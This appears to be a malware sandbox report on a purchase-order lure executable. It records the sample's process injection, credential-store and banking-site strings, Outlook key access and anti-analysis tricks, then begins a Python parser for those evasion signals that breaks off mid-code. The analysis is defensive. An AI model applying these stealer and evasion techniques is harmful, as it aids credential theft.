Source: grpconv.exe, 00000005.00000002.3859947867.000000000281E000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000002.3859947867.00000000027F1000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000002.3859947867.0000000002841000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000003.1816235847.0000000002812000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000002.3859947867.0000000002812000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Purchase Order_ AEPL-2324-1126.exe | Virustotal: Detection: 27%
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | File read: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe
Source: unknown | Process created: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe "C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe"
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe"
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe | Process created: C:\Windows\SysWOW64\grpconv.exe "C:\Windows\SysWOW64\grpconv.exe"
Source: C:\Windows\SysWOW64\grpconv.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe"
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe | Process created: C:\Windows\SysWOW64\grpconv.exe "C:\Windows\SysWOW64\grpconv.exe"
Source: C:\Windows\SysWOW64\grpconv.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Section loaded: msdart.dll
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\grpconv.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\grpconv.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\grpconv.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\grpconv.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\grpconv.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\grpconv.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\grpconv.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\grpconv.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\grpconv.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\grpconv.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\grpconv.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\grpconv.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\grpconv.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\grpconv.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\grpconv.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\grpconv.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\grpconv.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\grpconv.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\grpconv.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\grpconv.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\grpconv.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\grpconv.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\grpconv.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Windows\SysWOW64\grpconv.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Purchase Order_ AEPL-2324-1126.exe | Static file information: File size 1509575 > 1048576
Source: Binary string: grpconv.pdb | source: svchost.exe, 00000002.00000003.1596658465.0000000003024000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594446965.000000000301B000.00000004.00000020.00020000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000003.00000002.3863139699.0000000000868000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: grpconv.pdbGCTL | source: svchost.exe, 00000002.00000003.1596658465.0000000003024000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594446965.000000000301B000.00000004.00000020.00020000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000003.00000002.3863139699.0000000000868000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: JkyHsYXxoyjW.exe, 00000003.00000002.3862718845.00000000005BE000.00000002.00000001.01000000.00000004.sdmp, JkyHsYXxoyjW.exe, 00000006.00000002.3858733307.00000000005BE000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP | source: Purchase Order_ AEPL-2324-1126.exe, 00000000.00000003.1472280499.0000000004680000.00000004.00001000.00020000.00000000.sdmp, Purchase Order_ AEPL-2324-1126.exe, 00000000.00000003.1471126837.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1628089939.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1500202206.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1628089939.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498259750.0000000003300000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000002.3869522876.00000000046BE000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000005.00000003.1630288499.000000000436D000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000003.1627999026.00000000041BD000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000002.3869522876.0000000004520000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: Purchase Order_ AEPL-2324-1126.exe, 00000000.00000003.1472280499.0000000004680000.00000004.00001000.00020000.00000000.sdmp, Purchase Order_ AEPL-2324-1126.exe, 00000000.00000003.1471126837.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1628089939.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1500202206.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1628089939.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498259750.0000000003300000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, grpconv.exe, 00000005.00000002.3869522876.00000000046BE000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000005.00000003.1630288499.000000000436D000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000003.1627999026.00000000041BD000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000002.3869522876.0000000004520000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: grpconv.exe, 00000005.00000002.3859947867.000000000279A000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000002.3870343838.0000000004B4C000.00000004.10000000.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000006.00000000.1694933032.0000000002C6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1925812145.00000000214CC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: grpconv.exe, 00000005.00000002.3859947867.000000000279A000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000002.3870343838.0000000004B4C000.00000004.10000000.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000006.00000000.1694933032.0000000002C6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1925812145.00000000214CC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00414860 push ebp; retf 2_2_00414861
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041480D push es; iretd 2_2_0041480F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041F0FC pushad ; ret 2_2_0041F12D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004120A9 push ss; iretd 2_2_004120AA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004031A0 push eax; ret 2_2_004031A2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041826C push ds; iretd 2_2_0041827D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004082E5 push 00000009h; retf 2_2_00408401
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004182EF push ebx; iretd 2_2_0041831C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040834C push 00000009h; retf 2_2_00408401
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00414459 pushfd ; retf 2_2_00414462
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040BE2C pushad ; ret 2_2_0040BE2D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040CEEF push 00000033h; iretd 2_2_0040CF00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A724 push ss; retf 2_2_0041A725
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A7D6 push edx; ret 2_2_0041A7D7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004117F3 push ds; iretd 2_2_004117F4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037309AD push ecx; mov dword ptr [esp], ecx 2_2_037309B6
Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 5_2_045509AD push ecx; mov dword ptr [esp], ecx 5_2_045509B6
Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 5_2_002EC1C3 push cs; ret 5_2_002EC1D7
Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 5_2_002DE650 push ds; iretd 5_2_002DE651
Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 5_2_002D8C89 pushad ; ret 5_2_002D8C8A
Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 5_2_002DEF06 push ss; iretd 5_2_002DEF07
Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 5_2_002E50C9 push ds; iretd 5_2_002E50DA
Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 5_2_002E514C push ebx; iretd 5_2_002E5179
Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 5_2_002D5142 push 00000009h; retf 5_2_002D525E
Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 5_2_002D51A9 push 00000009h; retf 5_2_002D525E
Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 5_2_002E7581 push ss; retf 5_2_002E7582
Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 5_2_002E7633 push edx; ret 5_2_002E7634
Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 5_2_002E166A push es; iretd 5_2_002E166C
Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 5_2_002E16BD push ebp; retf 5_2_002E16BE
Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 5_2_002EDA1F push eax; retf 5_2_002EDA20
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\grpconv.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\grpconv.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\grpconv.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\grpconv.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\grpconv.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeAPI/Special instruction interceptor: Address: 40032B4
            Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
            Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
            Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
            Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
            Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
            Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
            Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
            Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
            Source: C:\Windows\SysWOW64\grpconv.exeWindow / User API: threadDelayed 6872Jump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeWindow / User API: threadDelayed 3101Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87608
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeAPI coverage: 3.7 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\grpconv.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\grpconv.exe TID: 7784Thread sleep count: 6872 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exe TID: 7784Thread sleep time: -13744000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exe TID: 7784Thread sleep count: 3101 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exe TID: 7784Thread sleep time: -6202000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe TID: 7808Thread sleep time: -80000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe TID: 7808Thread sleep count: 39 > 30Jump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe TID: 7808Thread sleep time: -58500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe TID: 7808Thread sleep count: 44 > 30Jump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe TID: 7808Thread sleep time: -44000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\grpconv.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_00452492 | FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_00442886 | FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_004788BD | FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_004339B6 | GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0045CAFA | FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_00431A86 | FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0044BD27 | _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0045DE8F | FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0044BF8B | _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 5_2_002EC5F0 | FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0040E500 | GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary
Source: 1ySo2KZ76.5.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: 1ySo2KZ76.5.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: 1ySo2KZ76.5.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 1ySo2KZ76.5.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: 1ySo2KZ76.5.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: 1ySo2KZ76.5.dr | Binary or memory string: outlook.office.comVMware20,11696492231s
Source: 1ySo2KZ76.5.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: 1ySo2KZ76.5.dr | Binary or memory string: AMC password management pageVMware20,11696492231
Source: 1ySo2KZ76.5.dr | Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 1ySo2KZ76.5.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: 1ySo2KZ76.5.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 1ySo2KZ76.5.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: 1ySo2KZ76.5.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 1ySo2KZ76.5.dr | Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: 1ySo2KZ76.5.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: JkyHsYXxoyjW.exe, 00000006.00000002.3864755286.0000000000D20000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
Source: 1ySo2KZ76.5.dr | Binary or memory string: discord.comVMware20,11696492231f
Source: 1ySo2KZ76.5.dr | Binary or memory string: global block list test formVMware20,11696492231
Source: 1ySo2KZ76.5.dr | Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 1ySo2KZ76.5.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: 1ySo2KZ76.5.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: 1ySo2KZ76.5.dr | Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 1ySo2KZ76.5.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: 1ySo2KZ76.5.dr | Binary or memory string: tasks.office.comVMware20,11696492231o
Source: 1ySo2KZ76.5.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: 1ySo2KZ76.5.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: 1ySo2KZ76.5.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: 1ySo2KZ76.5.dr | Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: grpconv.exe, 00000005.00000002.3859947867.000000000279A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
Source: 1ySo2KZ76.5.dr | Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: 1ySo2KZ76.5.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: 1ySo2KZ76.5.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 1ySo2KZ76.5.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: firefox.exe, 00000008.00000002.1927161385.0000029EA137C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll::
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | API call chain: ExitProcess graph end node | graph_0-86739
Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\grpconv.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0377096E | rdtsc
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004176C3 | LdrLoadDll
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0045A370 | BlockInput
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0040D590 | GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0040EBD0 | LoadLibraryA,GetProcAddress
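The evidence lines above (sleep loops past the 30-iteration threshold, the FindFirstFileW/Sleep/FindNextFileW walk, the DebugPort query, the rdtsc read, the IsDebuggerPresent call) and the fs:[00000030h] reads that follow are exactly the signals a triage queue wants pulled out of a Joe Sandbox text export automatically. The script below is an added example written for this page, not code from Joe Security or from the report itself. It parses a constructed handful of lines in the same fused layout as this export (paths shortened, every sample line is made up for the example) and reduces them to an evasion summary plus a list of flags. The 30-iteration sleep-count threshold and the 30000 long-delay threshold mirror the values the report prints; the reading of "Process queried: DebugPort" as NtQueryInformationProcess(ProcessDebugPort) is my interpretation, and the regular expressions are my own rather than a documented report schema.

```python
import re
from collections import Counter

# Constructed sample in the fused layout of a Joe Sandbox text export (column
# separators and the "Jump to behavior" link residue run straight into the text).
# Paths are shortened; these lines are made up for this example, not copied from an export.
SAMPLE_REPORT = r"""
Source: C:\Program Files (x86)\JkyHsYXxoyjW.exe TID: 7808Thread sleep count: 39 > 30Jump to behavior
Source: C:\Program Files (x86)\JkyHsYXxoyjW.exe TID: 7808Thread sleep time: -58500s >= -30000sJump to behavior
Source: C:\Program Files (x86)\JkyHsYXxoyjW.exe TID: 7808Thread sleep time: -44000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,0_2_0040D590
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov ecx, dword ptr fs:[00000030h]2_2_037B035C
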